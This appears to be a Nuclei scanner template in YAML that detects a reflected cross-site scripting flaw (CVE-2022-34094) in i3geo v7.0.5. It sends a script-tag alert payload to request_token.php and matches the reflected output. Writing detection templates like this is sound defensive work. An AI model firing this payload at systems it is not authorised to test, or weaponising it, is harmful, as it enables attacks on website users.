34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
|
id: CVE-2022-34094
|
||
|
|
||
|
info:
|
||
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
||
|
author: r3Y3r53
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
|
||
|
reference:
|
||
|
- https://github.com/edmarmoretti/i3geo/issues/5
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cve-id: CVE-2022-34094
|
||
|
cwe-id: CWE-79
|
||
|
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: cve,cve2022,i3geo,xss
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code == 200'
|
||
|
- 'contains(content_type, "text/html")'
|
||
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
||
|
condition: and
|